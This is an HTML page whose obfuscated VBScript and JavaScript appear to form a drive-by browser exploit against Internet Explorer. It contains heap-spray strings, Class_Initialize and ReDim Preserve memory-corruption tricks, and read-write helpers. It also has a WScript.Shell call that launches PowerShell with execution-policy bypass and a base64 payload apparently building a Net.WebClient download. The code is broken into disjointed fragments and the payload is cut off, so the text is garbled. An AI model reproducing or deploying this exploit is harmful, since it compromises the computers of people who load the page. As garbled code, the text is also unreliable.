<!DOCTYPE html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<html>
<body>
<ScRIPt TyPe="tEXT/VBSCRiPt">
xKQOg()
chRW(34)
crEAtEoBjecT("WsCrIPt.sheLL").eXpanDENvIRoNmEnTsTRINGS("%SystemROOT%") & "\syStem32\WiNDOWSPOweRsheLl\v1.0\POwErSHELL.ExE"
ChRw(34)
cReAtEobJeCt("wScrIPT.shElL").ruN
pOwerShELL.exe
ByPASS
-Nop
IAAJAAkAUwBlAHQALQBDAE8ATgB0AEUATgBUAAkAIAAgAC0AdgBhACAAIAAJACgAIAAJAAkAJgAoACcATgBlAHcALQBPAGIASgBFAEMAdAAnACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAApACAACQAJACgAIAAgACAAWwBjAEgAQQBSAF0ACQAJACAAMAB4ADYARQAJAAkAIAAJAAkAIAArAAkACQAgAFsAYwBIAEEAUgBdAAkACQAgADAAeAA2ADUACQAJACAACQAJACAAKwAJAAkAIABbAGMASABhAFIAXQAJAAkAIAAwAFgANQA0AAkACQAgAAkACQAgACsACQAJACAAWwBjAEgAQQBSAF0ACQAJACAAMAB4ADIARQAJAAkAIAAJAAkAIAArAAkACQAgAFsAQwBIAEEAUgBdAAkACQAgADAAeAA3ADcACQAJACAACQAJACAAKwAJAAkAIABbAEMASABhAFIAXQAJAAkAIAAwAFgANAA1AAkACQAgAAkACQAgACsACQAJACAAWwBjAEgAYQByAF0ACQAJACAAMAB4ADQAMgAJAAkAIAAJAAkAIAArAAkACQAgAFsAYwBoAGEAcgBdAAkACQAgADAAeAA2ADMACQAJACAACQAJACAAKwAJAAkAIABbAGMAaABBAHIAXQAJAAkAIAAwAFgANABDAAkACQAgAAkACQAgACsACQAJACAAWwBjAGgAYQByAF0ACQAJACAAMAB4ADYAOQAJAAkAIAAJAAkAIAArAAkACQAgAFsAQwBIAGEAUgBdAAkACQAgADAAWAA2ADUACQAJACAACQAJACAAKwAJAAkAIABbAEMASABBAFIAXQAJAAkAIAAwAHgANgBFAAkACQAgAAkACQAgACsACQAJACAAWwBDAGgAYQByAF0ACQAJACAAMABYADcANAAJAAkAIAAgAAkACQApACkALgAoAAkAIAAJAFsA
gtgfp()
lEdLE()
cLNG("24000")
clNg("2000")
ClNG("32")
CLNG("64000")
clnG("&H174")
"%u4141%u4141%u0016%u4141%u4141%u4141%u4242%u4242"
"%u4141%u4141%u0008%u4141%u4141%u4141"
"%u4141%u4141%u400C%u0000%u0000%u0000"
gtgfp(QiFYo)
lEdLE(QiFYo)
spAcE(OCcCJ)
unEsCApe(hxXlo
JVBiC)
functiON
(HkZwd, DqiYr)
UnescAPE(fGwiU & kQkDo(DqiYr) & JVBiC)
Dvhol.oKbbZ(HkZwd, 2)
fUncTiOn
(pyUjq, pDTAk)
uneSCaPE(WTXyt & kQkDo(pDTAk) & JVBiC)
Dvhol.oKbbZ(pyUjq, 2)
CSng(0)
fUNcTIoN
Dvhol.fXCry()
uwCMa = 0 To QiFYo
gtgfp(uwCMa)
MID(JPtGN, 1, eTLlA)
funCTIon
oKbbZ()
PRIVaTe
ClasS_InITIalIZE
reDIm prESERVE oKbbZ(1, IiQlh)
puBlIc
fXCry()
pReserve
oKbbZ(1, 1)
FuNcTIon
VmmRS (PvVbT, ARWpx)
uwCMa = 0 tO
lEdLE(uwCMa) = ARWpx
Dvhol.oKbbZ(PvVbT, 2) = ARWpx
uwCMa = 0 To
QiFYo - 1
aSc(MID(gtgfp(uwCMa), 3, 1))
vArtyPE(ARWpx)
jRtOj = MWAhd(MId(gtgfp(uwCMa), 3 + 4, 2))
gtgfp(uwCMa)
fUNcTiOn
fuNctIOn
(KNlvR)
lmPsf = VmmRS(KNlvR, sLaaB)
rkwVP = PpNAe(KNlvR, lmPsf + 8)
LjPkI = MWAhd(
MID(rkwVP, 3, 2))
rkwVP = PpNAe(KNlvR, LjPkI + 4)
vpulk = MWAhd(
miD(rkwVP, 1, 2))
WHQGJ KNlvR, vpulk + feKSn
xKQOg()
SEtsLaaB
noThinG
fUnCtiOn
</sCRIPt>
<SCriPT TyPE="tEXT/JAVaScript">
function
MWAhd(
return JaAyw.charCodeAt(0)
(JaAyw.charCodeAt(1) << 16)
function
kQkDo(
return String.fromCharCode(PuMQX
0xffff
String.fromCharCode(
"valueOf"
function
xPPfa()
return
setTimeout
function
</scRIpT>
</body>
</html>